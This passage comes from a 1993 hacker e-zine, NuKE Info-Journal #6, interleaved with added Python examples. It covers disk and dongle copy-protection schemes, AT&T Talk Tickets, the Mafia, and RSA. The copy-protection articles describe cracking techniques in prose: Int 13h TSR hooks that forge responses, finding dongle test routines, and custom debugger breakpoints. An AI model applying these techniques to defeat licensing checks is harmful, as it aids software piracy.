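    """Constructed track 0 with the article's 9 sectors (0-8), written out of
    order to show that the search does not depend on physical position."""
    order = [0, 3, 6, 1, 4, 7, 2, 5, 8]
    sectors = [(n, bytes([n + 1]) + b"\x00" * (SECTOR_SIZE - 1)) for n in order]
    return build_track(0, sectors, data_checksum)
```

Reading the `protected' track with the standard XOR finds the sector but burns all five retries on the data checksum, which is exactly the symptom the text describes for a disk whose own DOS uses a different algorithm.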
Bit copiers read each track, and attempt to reproduce what they find exactly on the destination disk, bit for bit. Error checking is performed by reading the track several times over and comparing the data. Completely unformatted tracks are identified and ignored.

% Spiral Tracking %

This is probably the ultimate in format alteration, and the last to be developed. This method was actually very clever. The way the data was structured on the diskette actually `looked' like a spiralling pattern. The floppy drive heads would travel a small arc starting from the outer track, then jump to the next track (or half-track) and immediately travel another small arc, then jump to the next track, and so on. The resulting series of arcs resembles a broken spiral, hence the name. So instead of track 1 being the outermost ring, it would spiral towards the innermost track. This type of protection is quite difficult for a bit copier to overcome, since it depends on the accurately synchronized copying of partially formatted tracks. Unformatted areas of tracks contain magnetic signals of intermediate values, bits neither 0 nor 1. Therefore it was extremely difficult for the bit copier to identify all those portions of the track that can be copied correctly. One serious problem with spiral tracking is that it depends on precise timing of events. If the disk drive is rotating a bit too fast or slow, or is slightly misaligned in other ways, the protected disk is likely to fail.

% Slow Drives %

Another protection technique, used in combination with some of the above methods, is to record the protected software using a disk drive turning SLOWER than normal. When data is recorded on a track passing slowly under the head, more data per inch than normal is recorded. This makes it possible to record more data on a track than would normally fit.
Therefore if the user tries to copy the software with a regular drive, the destination disk will complete a full revolution before all the data is copied, and the tail of the track will overlap and destroy the head of the track on the destination disk.

% Copy-protection Method #2 : Signatures %
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

As we could see in the protection wars, escalation proceeded rapidly. The methods described above were all `format alteration' methods. They use a non-standard disk format that is not recognized by standard copy programs, but is copyable by the bit copiers. So a new method was introduced, the signature, which was any minor feature of a disk that serves as an identification mark to verify that the disk is an original. To be effective, a signature must be a feature that is not properly duplicated by a copy program, including bit copiers.

% Innermost track %

Probably the first signature protection method was the use of an extra track. A normal IBM disk uses tracks 0 to 39. The disk drive is in fact capable of stepping the head to an extra innermost track, track 40 (and sometimes to track 41). The innermost track is normally unused because of reliability problems. A protected program may format this track and use the fact that it is formatted as a signature to verify that the disk is an original. It may even keep some portion of itself (eg the disk directory) on the innermost track. An ordinary copy program will overlook this track, and a bit copier will only copy it if specifically instructed to.

% Check for write-protection %

An ancient and crude signature method is to issue original disks with the write-protect notch covered. The program would try to write to the disk; if the write operation succeeds, the program can assume that the user made a duplicate disk and refuse to execute.

% Bit Counting %

It is _very_ difficult to get two disk drives to turn at precisely the same speed.
Any characteristic of a disk that depends critically on the speed of the drive on which it was recorded will make a good signature. For example, when a disk is formatted, there is always some empty space remaining on each track between the end of the last sector and the beginning of the first sector. The formatting program fills this space with meaningless bits. The size of the space, and therefore the number of bits in it, and therefore the total number of bits on the track, depends on the rotational speed of the disk drive. If the bits are counted, and the count is recorded somewhere else on the disk, the software can compare the number of bits to the count every time the disk is booted. If a duplicate is made on a different drive, the duplicate disk will have a different number of bits on that track, and the count will fail. Even small variations in the speed of a single drive will cause different disks made on that drive to have different numbers of bits per track, so that each disk has a different signature.

This is an _extremely_ difficult protection method for bit copiers to overcome. Some versions of Locksmith included a utility to prompt the user to adjust the speed of the drive (by turning a vernier with a screwdriver) until it matched the apparent speed of the drive on which the original disk was recorded. However, E.D.D. (Essential Data Duplicator) used a variable timing loop to vary the rate at which the bits are recorded on the destination disk, to compensate for the speed of the destination disk drive. These methods required a great deal of trial-and-error to make satisfactory duplicate disks.

% Deliberately Damaged Media %

This method consists of deliberately damaged media: a disk which is damaged in a predictable way that can be detected by the software. The damage serves as a signature. An example is the `Prolok' system by Vault Corporation. Prolok is a special disk sold to software companies, to publish their programs on.
The disk included software that may be adapted to work with any application program the software publisher records on the disk. The signature is a small hole, cut by laser, in the recording surface of the disk. The Prolok software can detect this hole because it is an area on which no data can be recorded: a bad sector.

Prolok is actually quite easy to defeat for a programmer. The technique was to insert a small TSR program hooked to Int 13h, which would review all requests by programs to the DOS. If Prolok asks the DOS to read the area of the disk where the hole is, the TSR captures the request and forges a reassuring response. There was also a public domain program specifically designed to defeat Prolok, called FUProlok.

In general ALL these disk-based copy-protection schemes had one major flaw: they all had some easy pattern that would enable us to defeat them easily. The pattern was the usage of Int 13h; the knowledgeable `cracker' would construct a simple generic TSR that would hook Int 13h and create a break-point (Int 3h) whenever the interrupt was called. From there the knowledgeable cracker could trace through the code, and see if the information obtained by the Int 13h was used in a peculiar way. Most programs are written in a high level language, so the use of Int 13h is not common, therefore get to the bottom of the Int 13h

% Difficulties of Disk-based Copy-protection %
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The major obstacle of disk-based copy-protection was the hard disk. Hard disk users were not content to run programs from floppy disks; they almost insisted on transferring the software to the hard disk. One solution that was adopted was for the program to execute itself from the hard disk, but to also require the floppy to be left in its drive. The floppy was usually referred to as a `key disk', which was periodically checked to validate the signature.
The major problem was that it didn't allow the user to have access to his floppy drive while using the hard disk. Another bad side effect was that it prevented users connected to a network from executing more than one copy at the same time, as you only had one copy of the `key disk' to go around. And none of the `format' method examples can be used on a hard disk. In general you cannot tamper with the structure of the hard disk, because it may contain several hundred different applications. Also the interface system does not give the host computer direct control of details like the number and arrangement of sectors per track or the count of bits on a track.

================================================================================
================================================================================

Volume 1, Issue 6, May 1993                              NuKE Info-Journal #6

"The `Arms Race' on Physical Protection Devices : Round Two"
By Rock Steady

% Physical Copy-protection Devices %

A physical protection device is usually a piece of equipment attached to a computer, or used in conjunction with a computer, to protect software or data. The majority of such devices are commonly referred to as `dongles', which are electronic devices attached to the computer. When dongle protection is used, no attempt is made to prevent the user or owner of the package from creating additional copies of the software. The device is designed to prevent unauthorised use and not unauthorised copying. The origin of the word `dongle' is obscure, but it originated about 1978-79 and is believed to have been first used to protect the `Wordcraft' package on the Commodore Pet.

% Dongles - A Simple Dongle Design %

The first problem in designing a dongle is finding some method of attaching the device to the hardware.
It must be a method which is available on the standard minimum configuration of the machine on which the software is intended to run. The _most_ obvious choice is the serial interface port, of which nearly every machine has at least one, especially with the increased use of mice and modems which require serial connections. Assuming further that we do not wish to use this port during the running of the program, then a very simple dongle could be constructed using the standard cabling and reverse channel, so that communications are usually made in both directions simultaneously. The wires would have the following functions:

Sending Channel
~~~~~~~~~~~~~~~
Request to send       (Output when the computer is ready to go)
Clear to send         (Received when the terminal is ready)
Transmit data         (Line for the computer to transmit the data)

Receiving Channel
~~~~~~~~~~~~~~~~~
Data Terminal Ready   (Output when the computer is ready to receive data)
Data Set Ready        (Received when the terminal is ready to transmit)
Receive Data          (Line for the computer to receive the data)
Carrier Detect        (Line for the modem to signal the computer that another modem signal has been found via telephone)
Ring Detect           (Line for the modem to signal the computer that a ringing tone has been received)

Assume that wires are used to connect the signals as shown below:

Standard outputs            Standard inputs
~~~~~~~~~~~~~~~~            ~~~~~~~~~~~~~~~
Transmit data...............Data Set Ready
Request to send.............Receive Data
Data terminal ready.........Ring Detect

This is a bizarre combination, which is extremely unlikely to be used by design with any sort of equipment. To protect our dongle we further seal the plug casing with pitch or epoxy resin, so that the details of the wiring cannot be seen without melting out or drilling away the resin. The representation of a `U' character in the standard ASCII code will appear as a square wave.
This is because the character itself has the binary value 0101 0101, and, taken with the character beginning pulse (start bit) and the character ending (stop bit), this makes up a square wave signal:

        1   0   1   0   1   0   1   0   1   0
+6v   ----+   +---+   +---+   +---+   +---+
          |   |   |   |   |   |   |   |   |
 0        |   |   |   |   |   |   |   |   |
          |   |   |   |   |   |   |   |   |
-6v       +---+   +---+   +---+   +---+   +----

Now, transmit a stream of `U's; since Transmit is connected to Data Set Ready, this line will go up and down at intervals of one bit. By sampling this line the program can test that the correct pattern is being transmitted and received. This means the dongle is in place.

This is perhaps a dongle suitable for the computer hobbyist; it is rather a poor attempt at a dongle. This is for several reasons: it does not allow the use of the serial port, because it is needed for the dongle, therefore a mouse or modem or printer connection via the serial port cannot be made if you only have one serial port.

% Advanced Pseudo Random Bit Generator Dongles %

Two new devices being marketed to software houses are Datakey (DES, 1988) and Software Key (Bristol, 1988). The overall concepts of both are similar, and they were in fact developed by the same inventor, although the two structures are quite separate and the details of the devices differ a lot. The devices are `active' dongles, meaning one end of the dongle plugs into the computer, and whatever is normally connected to the RS232 port is connected to the other end, and should be unaffected by this device. In the Datakey, which is a bit oriented device, toggling the Data Terminal Ready line causes a single bit of data to be presented at the Data Set Ready or the Data Carrier Detect line. By this means, a string of pseudo random binary data of any length can be read out of the device. Assembly language routines are included with the device for linking into the software to be protected.
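The cross-wired serial dongle and its `U' square-wave test, simulated as an added Python example (not code from the article or any product): a port model, the three cross-connections from the wiring table above, and the presence check the protected program would run. The SerialPort class, the line names and the probe count are assumptions; the frame uses the real UART convention (start bit 0, data LSB first, stop bit 1), which yields the same alternating pattern the article draws with inverted polarity.

```python
"""Simulation of the cross-wired RS232 dongle described above and the
presence test that sends `U' and watches Data Set Ready.
Constructed example, not from the article; the SerialPort model and the
line names are assumptions for illustration."""

# Lines the computer drives (outputs) and lines it reads (inputs).
OUTPUTS = ("TxD", "RTS", "DTR")
INPUTS = ("RxD", "CTS", "DSR", "DCD", "RI")

# The dongle's wiring exactly as in the article's table: output -> input.
DONGLE_WIRING = {"TxD": "DSR", "RTS": "RxD", "DTR": "RI"}


class SerialPort:
    """A serial port whose input lines are driven by whatever is plugged in.
    `device` is a wiring dict (output line -> input line it is tied to) or
    None when nothing is attached and every input simply reads 0."""

    def __init__(self, device=None):
        self.device = device
        self.lines = {name: 0 for name in OUTPUTS + INPUTS}

    def drive(self, output: str, level: int) -> None:
        self.lines[output] = level
        if self.device and output in self.device:
            self.lines[self.device[output]] = level

    def sample(self, input_line: str) -> int:
        return self.lines[input_line]


def frame_byte(value: int) -> list:
    """Asynchronous serial frame: start bit 0, eight data bits LSB first,
    stop bit 1 (real UART convention; the article draws the same wave with
    the opposite polarity). For 0x55 this is an alternating 0/1 sequence."""
    return [0] + [(value >> i) & 1 for i in range(8)] + [1]


def is_square_wave(bits: list) -> bool:
    """True when the level changes at every bit boundary."""
    return all(a != b for a, b in zip(bits, bits[1:]))


def dongle_present(port: SerialPort, probes: int = 3) -> bool:
    """Presence check: clock a `U' frame out on TxD one bit at a time and
    read DSR back after each bit; then toggle RTS and DTR and require RxD
    and RI to follow. All three cross-connections must hold on every probe,
    so a plain TxD->RxD loopback plug or an empty port fails."""
    expected = frame_byte(0x55)
    for _ in range(probes):
        seen = []
        for bit in expected:
            port.drive("TxD", bit)
            seen.append(port.sample("DSR"))
        if seen != expected or not is_square_wave(seen):
            return False
        for out, inp in (("RTS", "RxD"), ("DTR", "RI")):
            for level in (1, 0, 1):
                port.drive(out, level)
                if port.sample(inp) != level:
                    return False
    return True
```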
In the Software Key, special command codes are used to trigger the device, which responds with a byte of pseudo random data. Such sequences only repeat after an extremely large number of operations.

% Software Sentinel %

The Software Sentinel (Sentinel, 1988) plugs into the parallel printer port of an 80x86. The parallel channel was preferred to the serial channel since the parallel channel is always present on many systems, even with the minimum configuration. However Sentinel also has a serial port version of this device, called the Sentinel S.

% Dongle Cracking %
~~~~~~~~~~~~~~~~~~~

Some experts are scornful of the protection afforded by dongles. Some even boast that 30 minutes would usually be sufficient to bypass any dongle protection in any program. As a matter of fact dongle cracking is actually straightforward: simply find the routine that performs the dongle test. The difficulty of this job is really based on the software used to access the dongle. If the software accesses the parallel/serial port via interrupt functions, a simple TSR program can be started to `fool' the program into thinking that a dongle is present, or one can simply trace through the code from that point on to see what actually happens, and what the program expects to get back. However I do not expect a program to use interrupts to access an I/O port, for the sole reason that it is easy to break in via the vector table. Chances are the software is accessing the I/O port directly with the built-in processor instructions (OUT/IN). So it will be up to the user to disassemble the program to search for IN/OUT or INS/OUTS or INSB/OUTSB or INSW/OUTSW instructions that will access the parallel/serial ports. Once you locate the routine that accesses the port, you may either reverse engineer it or set a break-point and begin your journey of debugging. Nevertheless, this does not nullify the credibility of dongle protection. As a matter of fact several new software packages are using dongles to protect their software.
But the fact remains that no software is 100% secure. A dongle requires software that `tests' whether the dongle is attached; therefore the test routine can be found, and therefore it can be modified.

% Lenslok % The Latest Physical Protection Device %
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The Lenslok device was also designed for the low-cost end of the software market. It consists of a plastic lens rather like a pocket magnifying glass, containing a series of prisms which cause anything viewed through it to be seen as a confused jumble of dots (pixels).

            Figure #1                      Figure #2
        1   2   3   4   5              A   B   C   D   E
      +---+---+---+---+---+          +---+---+---+---+---+
      |   |   | X |   |   |          | X |   |   |   |   |
      +---+---+---+---+---+          +---+---+---+---+---+
      |   | X |   | X |   |          |   | X |   | X |   |
      +---+---+---+---+---+          +---+---+---+---+---+
      | X |   |   |   | X |          |   |   | X |   | X |
      +---+---+---+---+---+          +---+---+---+---+---+
      | X |   |   |   | X |          |   |   | X |   | X |
      +---+---+---+---+---+          +---+---+---+---+---+
      | X | X | X | X | X |          | X | X | X | X | X |
      +---+---+---+---+---+          +---+---+---+---+---+
      | X |   |   |   | X |          |   |   | X |   | X |
      +---+---+---+---+---+          +---+---+---+---+---+
      | X |   |   |   | X |          |   |   | X |   | X |
      +---+---+---+---+---+          +---+---+---+---+---+

The letter `A' normally looks like the pattern in figure #1. Scrambled, it could look like the pattern in figure #2: all that was done was to interchange columns 1 and 3. Swap columns A and C back and we get the character `A' once again. The Lenslok is then a simple optical system, two shallow angled grooves cut into the plastic, which swaps the columns over. The user holds the `lens' against the screen, over the jumbled pattern of dots, and presses a key until the pattern reads correctly through the prism.
So in a Lenslok-protected system you may be shown a scrambled word which the program asks you to type in; you hold the lens over the characters and, voila, there it is.

% Cracking all together now... %
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Lenslok is a great physical copy-protection: it is low-cost, and it can be used in conjunction with the `document protection' currently in wide use in low-cost software, especially home entertainment computer games. Document protection is where the program, usually at start-up, stops for a moment and asks you a question whose answer is found only in the documents supplied with the original package. On its own, document protection is fairly weak, as documents can easily be photocopied, or scanned as a computer image and distributed by modem through the BBS scene. Lenslok can shore it up to an extent, since a lens is not easily copied by the average computer hobbyist: even with a copy of the documentation, how is the copier to know what exactly the software is asking for?

All together now: _ALL_ protection schemes developed so far can be broken, be it Lenslok, dongles or disk-based protection schemes. This is because every protection scheme has to rely on some piece of software that `tests' and decides whether this is an authorised copy or not, and that is the terrible weak spot. Software protectors have developed _amazing_ protection schemes; the `front' of the protection is almost unbreakable. Imagine a castle in medieval times, with a moat around it containing deadly man-eating animals; the front of the castle has men waiting with boiling oil to pour over you, and several more with bows and arrows waiting to kill you. Now, how effective is all this if somebody leaves the back gate unlocked?
Sure, it may be nearly impossible to get through the front, but the back gate is unguarded. The same applies to copy-protection: the fact of the matter is that nobody has done anything about low-level entry. Anyone fluent in 80x86 assembly language can bypass a copy-protection. The only problem is finding the routine, which is a challenge in itself: it is rarely just a CMP instruction. For some reason NPC members think that CMP is all there is to look for. Aren't they accomplished crackers? Cracking involves a lot of time, a deep knowledge of the 80x86, and a few tricks of the trade. If a document check is waiting for you to type an answer, you need to set a breakpoint at that exact location. Ctrl-Break will _rarely_ work, so you will have to make tools of your own that let you drop into the debugger at the desired location. Protected software usually overwrites Int 3h (breakpoint) and Int 1h (single-step) to defeat debuggers, so you have to devise your own breakpoint mechanism: perhaps a TSR hooked to Int 9h (the keyboard) which, on ALT-A, writes your debugger's entry point back into the Int 3h vector and then executes an Int 3h. I would hook my TSR to Int 5h, so that Print-Screen loads the debugger. Often you also have to put a routine on the timer interrupt, Int 8h or 1Ch, to make sure your entry point is not wiped from the vector table while the protection runs. There is an unlimited number of possible combinations and I certainly cannot name them all. What I can do is give you the theory behind the protection scheme, and you can devise your own preferred method. Many people enjoy reverse engineering; some (like myself) take note of all the system I/O and interrupts being called and work their breakpoints from there. But this two-part article was meant to give you an understanding of how some copy-protection schemes work. The _only_ way to defeat a protection is to understand how it works.
Then your attempts to bypass it will be much more effective than a blind guess. Be direct: go straight to the source of the conflict and don't waste your time on anything else. I hope this has been a learning experience for at least some of you. If the demand is there, a following journal may focus on effective cracking techniques, and some tricks and tips to avoid falling into a ditch.

Rock Steady/NuKE

===============================================================================

Volume 1, Issue 6, May 1993                                NuKE Info-Journal #6

                              "AT&T Talk Tickets"
                                       By
                                   Nowhere Man

Introduction
~~~~~~~~~~~~

As many people know, many countries throughout the world have begun installing a new pay phone system which takes "phone cards" in addition to or instead of coins. These phone cards are unlike U.S. calling cards; they are more like credit cards: they have a magnetic strip which holds the value of the card. You buy a card in a certain denomination (say $10) and then you can place that amount of calls with the card. The U.S., however, is unwilling and unable to implement such a program. (Remember, this is the country which brings you the English system of measurement!) Not only would it cost too much, so they say, but there is also a problem not found in most other countries: competition. Pay phones may be owned by anyone, from the local phone company to the foreigner who owns the local Dunkin' Donuts; to get everyone to agree on a standard and to replace existing phones with card-ready phones would be unfeasible. So now AT&T and U.S. Fibercom are introducing an alternative: "Talk Tickets."

What are Talk Tickets?
~~~~~~~~~~~~~~~~~~~~~~

Talk Tickets are not magnetic-striped cards or calling cards; they're a strange cross between the two. You'll be able to purchase a Talk Ticket in certain denominations, each carrying a certain number of $0.60 "units." Cards will be available in 5, 10 and 50 unit ($3, $6 and $30) denominations. The card itself is a small cardboard ticket bearing a unique eleven-digit serial number (and some rate/call information). You call an 800 number and a voice prompts you for your ticket number. Once you've entered a valid number, the voice tells you how much money is left on the ticket (you don't have to use the full value of the ticket on one call; leftover credit is kept track of). Then you place your call just as if you were dialing from a normal line, with a few exceptions: there are special "star" services you can dial, recordings costing one unit each (like 976 numbers), and international calls do not require the usual "011" prefix. The call is then handled normally; however, if your ticket runs out of credit during the call you are abruptly disconnected.

Costs
~~~~~

As mentioned before, calls are billed in $0.60 units. The chart below gives the cost, in units per minute, for calling various locations.

    Area                                   Units/Minute
    ~~~~                                   ~~~~~~~~~~~~
    *1 (Sports News)                             1
    *2 (World News)                              1
    *3 (U.S. Weather)                            1
    Asia (incl. Australia and NZ)                5
    Africa                                       5
    Canada                                       3
    Europe (except former U.S.S.R.)              4
    Russia/Former U.S.S.R.                       5
    South America                                4
    United States (incl. AK and HI)              1

These rates are much higher than standard calling card or direct-dial rates: a call to Europe is $2.40/minute, Canada is $1.80/minute, and Asia is a whopping $3.00/minute. This is cheaper than a coin call from a pay phone, but other than that it's extremely expensive.

Where do I get Talk Tickets?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Right now Talk Tickets are available on a limited trial basis via McDonald's. That's right, McDonald's.
Three-unit Talk Tickets will be given away free in Super-Value Meals until June; the catch is that it's a limited trial offer, available only in the following areas: New York City, Buffalo/Syracuse, Baltimore, Pennsylvania and Wisconsin. You can also get them via Patrick Townson, moderator of the Telecom Digest on the Internet (ptownson@eecs.nwu.edu), for $2 per four units (or $1.50/card in groups of ten or more). In addition, Talk Tickets should soon be on sale at AT&T phone centers near you...

Important Numbers
~~~~~~~~~~~~~~~~~

The 800 Talk Ticket access number is 800-331-0888. For more information about the Talk Ticket program, call 800-462-1818 (outside the U.S. call 408-428-2734 collect). The operator will be happy to answer your questions about the Talk Ticket program.

Hacking Talk Tickets
~~~~~~~~~~~~~~~~~~~~

I'm sure the first thing you thought of when you read about Talk Tickets is "how can I abuse them?" Well, there's really no reason to. The serial number is eleven digits, but it is generated algorithmically, meaning it *can* be hacked. However, even if you do manage to generate your own Talk Ticket numbers, they are not of much value if you're calling outside the U.S. You can get almost an hour within the country on a 50 unit ticket, but that same ticket would only get you about 12 minutes to Europe or 10 minutes to Asia. You're better off not wasting your time; calling cards are much better.

Conclusion
~~~~~~~~~~

SAVE YOUR MONEY. There is little reason to use the Talk Ticket program. Calling card calls are much cheaper; heck, even hotel surcharges are usually less costly! In addition the potential for abuse is limited: the most you could defraud would be 10 minutes to Australia, big deal. The one key advantage the tickets offer, though, is anonymity. You are just a number; unlike with a calling card, you pay cash up front and are not billed directly, so your privacy is maintained.
So, unless you need the protection (and are willing to pay through the nose for it!) AT&T Talk Tickets are a waste of time and money.

Nowhere Man/NuKE

===============================================================================

Volume 1, Issue 6, May 1993                                NuKE Info-Journal #6

                             "Mafia, Incorporated."
                        Italy's underworld extends its reach
                                       By
                                  The Godfather

Like any business bursting at the seams of its own success, the Mafia and its allies know no borders. Born of a transatlantic axis, the Mafia has forged alliances wherever it has needed to, sponsoring indigenous crime syndicates or helping rivals to wipe each other out. The manipulation of the Turkish heroin "Babas" or the drug barons of Colombia has become a model of how to operate an empire to the conquering power's advantage. Internationally, the Mafia is stronger than ever before; recent crackdowns show it to be expanding with speed in Russia and other post-communist countries, buying up chunks of the economy, laundering money, dealing with local gangsters, and preparing to create and cultivate an eager market for hard drugs. The Mafia runs the world's drug-dealing business, and its wealth is inestimable. The giddy profits from South America, the US and the Far East are laundered, recycled and hidden by the best wizards in the money business across an impenetrable labyrinth of `legal' commercial activities. "They would do well to go to Harvard Business School," says Leoluca Orlando, the ousted anti-Mafia mayor of Palermo, Sicily. This is probably true, though it would be hard to put to the test, because to `protect' the empire the Mafia must kill.
And however wide its intercontinental span, it kills mainly on its own ground and at its nerve centre, where until now it has enjoyed relative impunity: in Italy. A bombing a year ago this month (May 1992) killed Judge Giovanni Falcone, one of the few men _ever_ to momentarily check the squalid advance of the Mafia. Mr. Falcone was described as "the world's _most_ wanted man", wanted, that is, by the Mafia: he held documentation and knowledge of the Mafia's structures, posing a great threat to it, and the Mafia killed him. After the killing of Mr. Falcone, one of the world's most heavily protected men, who was to challenge the Mafia and continue his work? Two months later a `fake' construction crew, pretending to repair a segment of highway, placed a bomb under that segment of `repaired' road. The bomb was set off just as Paolo Borsellino passed over it in his limo. Borsellino had _secretly_ taken over from Falcone as head of the anti-Mafia group in Palermo. How did the Mafia find out so quickly? The Mafia has extremely loyal men at almost every level of government, and someone tipped it off that Mr. Borsellino was to head a new anti-Mafia agency in Rome. With this simple message of triumphant mockery, the Mafia confirmed that it will wage its latest, and potentially its bloodiest, battle against Italian society with a sick blend of fury and cool, diabolical arrogance. This time the Mafia's violence is not between clans, nor is it the _usual_ picking off of inconvenient politicians and judges at intervals of years. This time the offensive is aimed at open opposition, terrorizing a rebelling populace back into submission. Following Borsellino's assassination, the Italian authorities sent in troops for the first time against the Cosa Nostra. Nobody had _ever_ dared to go against the Cosa Nostra!
The Cosa Nostra has grown from what was believed to be a band of gangsters operating out of the chaos of postwar Sicily to become, in 47 years, an unchallenged and unchallengeable global crime syndicate. The officials and troops are shadowboxing, and judges have resigned, saying that their work is pointless, their lives undefended and their investigations blocked from on high. The killers of Falcone and Borsellino want to show that they can kill with impunity and that they are protected from within the system. Almost _every_ time the judiciary peels away the covers of Italian high finance, construction, tourist development, local politics or public-sector spending excesses, it finds the Mafia. Every illegal arms deal and, of course, every drug haul leads directly to the Mafia. There seems to be no obvious explanation for its success other than ruthless cruelty, unfettered greed, friends in high places, and the perpetuation of the picturesque and bogus mythology in which the Mafia's squalid operation is gift-wrapped for Hollywood and young inmates alike. The `super-boss' of this awesome empire, on the run since 1969 and the world's most wanted man, is Salvatore `Don Toto' Riina, head of the clan from Corleone, the town that gave its name to Francis Ford Coppola's glitzy `Godfather' clan. Riina was the right-hand man of Luciano Liggio, who was arrested one night in 1973 while reading Kant's `Critique of Pure Reason' and has been imprisoned ever since. Liggio had built up the Corleone clan, the main victors of the Mafia war of 1981-83 that left the defeated clans obliged to work as clients, subject to Corleone approval. Riina and his partner Bernardo Provenzano, known as `The Beasts', carried out Liggio's orders. Riina is wanted for ordering some 150 murders and is said to have committed 40 himself. They were the founders of the empire.
Perhaps most extraordinary, Riina is the man whom the authorities believe finally subjugated the New York wing of the Mafia not only to Sicily but to his clan. The authorities also confirm that the Corleone clan manages the affairs of the Sicilians' long-standing colony in South America, notably in Venezuela. The Cuntrera and Caruana families from Agrigento are now prime managers of South America's current cocaine surplus. The most recent summit ever recorded by the authorities took place on Valentine's Day 1989 at the Elysee hotel in Nice: a meeting of a consortium comprising the Sicilian Mafia, the giant Mafia, the octopus, along with the two other arms of the Italian crime empire, the Calabrians and the Camorra of Naples. Representatives of the Colombian and Venezuelan cartels were also present. The outcome of this meeting was an alliance and a carving up of the trade bringing heroin from the East and cocaine from South America. By and large, the Sicilians kept the heroin routes and a foothold in the white-powder trade, the Calabrians won a lucrative client role in heroin, and the Camorra emerged as the specialists in cocaine. The Camorra's international interests span South America and the Spanish and French Rivieras. It has drug-peddling bases in Holland and Germany. For the first time, the Mafia faces a new enemy: its own subjects. The rebellion appeared in the last few years, when Leoluca Orlando, mayor of Palermo, promised to confront the Cosa Nostra. He _did_ expel the Mafia from city hall. The revolt went on: Libero Grassi, a businessman in Capo d'Orlando, refused to pay his small protection fee; he was shot as a lesson to others. The killings of the two judges (Falcone and Borsellino) provoked street rebellions, general strikes, and the biggest demonstration in Italy's history. The fear of violence has led the European Community (EC) to fight back. Europol, the European police, had until recently been nothing more than a harmless paper creation.
But this was to change starting January 1st, 1993. Today Riina is held at Rebibbia prison in Rome, where interrogation has already begun. So far Riina has refused to cooperate with his captors, who nevertheless say that he is behaving `with the politeness of a Sicilian that does not exist any more'. Riina was arrested in Palermo, Sicily, in January 1993. During the period of surveillance, which began soon after the assassination of Judge Giovanni Falcone, Riina met with politicians of the highest level. Organized crime has long operated internationally, with no boundaries; perhaps Europol, a police force with no boundaries, is exactly what is needed? And was Riina's capture the result of Europol? Many would disagree. Nevertheless the Mafia continues, with or without Riina. 1993 will be a dreadful year for the Mafia, and it is not over yet. One of the `big' players, Riina, is gone; what happens now?

"L'appetito viene mangiando" (Translation: appetite comes with eating.) The Mafia, already fed to bursting, remains very hungry indeed.

===============================================================================

Volume 1, Issue 6, May 1993                                NuKE Info-Journal #6

                   "Rivest, Shamir, Adleman, (RSA) Encryption"
                                       By
                                  Rock Steady

Ahh, the last NuKE Informational Journal (#5), concerning DES encryption, brought about a fair number of generous reviews. It has even inspired me to continue this topic of `digital security'; henceforth I introduce to you RSA. Rivest, Shamir and Adleman (RSA) are the three mathematicians who invented and patented the RSA `public-key' cryptosystem, which is by no means `just another' encryption method. Public-key cryptosystems are often referred to as `asymmetric' cryptosystems.
The now-famous DES is a `symmetric' cryptosystem: a single key is used for both encrypting and decrypting. An asymmetric system, on the other hand, has two keys: a public key used to encrypt, and a private key used to decrypt the cipher. (Cipher, or ciphertext, is data that has been encrypted.) RSA works on the idea that, while multiplying two large prime numbers is easy, breaking their product back into those factors is hard. The algorithm works like so: first pick a number N that is the product of two prime numbers (call the two primes a and b, so that N = a x b). Next, pick a number that will become your public key and call it P; P _must_ be less than N and, as we will see below, must share no factor with (a-1) or (b-1). Now to encrypt a message M you simply apply the following formula:

    C = M^P (mod N)

% What the hell's `mod'? %

Public-key cryptosystems depend heavily on the branch of number theory known as modular arithmetic, or finite math. "Mod" can be read as the remainder of a division: 13 mod 5 = 3, since that is the remainder when 13 is divided by 5. Modular math also has a pattern, a range, fixed by the modulus. The integers modulo 50 are the numbers 0, 1, 2, ..., 49: the smallest is 0 and the largest is the modulus minus 1. A less formal and probably easier-to-visualise picture is `clock arithmetic'. If you restrict yourself to doing math by moving the hour hand clockwise (addition) or counterclockwise (subtraction) around the face of a clock, you soon see obvious patterns. No matter how complex the calculation, the answer is _always_ some number in the range 1 to 12, the hours on a standard clock. This is the basis of `finite' mathematics: you always work with integers, and always with a finite set of them. Results of addition, subtraction, multiplication and division therefore _always_ land in the set defined by the modulus. (Huh? How can that be?)
As with the clock, the numbers "wrap around": if the integers modulo 50 are the set 0 -> 49, then once we reach 49 (the largest) and add 1, we get 0. The number 49 wraps around to 0, and the reverse is also true (0 minus 1 wraps around to 49). The great thing about modular math is that it is finite: you don't have to worry about calculations yielding numbers that grow out of control, and, since we are working with integers, you don't lose any information through round-off errors as you would with floating point.

Back to our formula, C = M^P (mod N), where C is the encrypted message. Notice that the message must be represented as a number; you could use the ASCII value of each character. (Beware, though: encrypting each character separately under the same P and N gives the same C for the same letter every time, so the result is no stronger than a substitution cipher. Real systems encrypt whole blocks, with padding.) It is not hard to find two large prime numbers a and b, but if I hand you only their product N, you may never find a and b again. So in RSA, N is a huge 512- to 1024-bit number which is the product of two large primes a and b. N is made public, while a and b remain secret, and as far as anyone knows the encrypted message cannot be recovered without factoring N.

Now to decrypt the message we use the same kind of formula with different factors:

    M = C^p (mod N)        (Note: this is lower case `p')

where `p' (lower case) is the secret key. The secret key is calculated from

    P x p = 1 (mod L)

where L is the least common multiple of (a-1) and (b-1). In mathematical terminology, `p' is the multiplicative inverse of `P' modulo L, which is why P must share no factor with L. Algorithms are available for computing least common multiples and multiplicative inverses in modular arithmetic (the extended Euclidean algorithm does the second). You can look these up in almost any good college mathematics book, as I cannot teach you math in a matter of paragraphs; but I suspect most readers already have such basic mathematical skills. Anyhow, RSA has undergone quite a bit of research around its algorithm.
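The formulas above carried through in Python, as an added example that is not part of the original article. The primes 61 and 53 and the exponent 17 are constructed toy values (a real modulus is 512-1024 bits), and pow(P, -1, L) is Python's built-in modular inverse. Beyond the encrypt/decrypt round trip it shows the two points just made, that P must be coprime to L and that encrypting one character at a time leaks repeated letters, and it carries out the factoring attack the article goes on to describe, by trial division, which only works because N is tiny.

```python
# Added example: textbook RSA in the article's own notation, with the
# factoring attack on a toy modulus.  Not code from the original article.
from math import gcd


def lcm(x, y):
    return x * y // gcd(x, y)


def keygen(a, b, P):
    """Return (N, P, p) for secret primes a, b and public exponent P.

    N = a*b is the public modulus, L = lcm(a-1, b-1) is the article's L and
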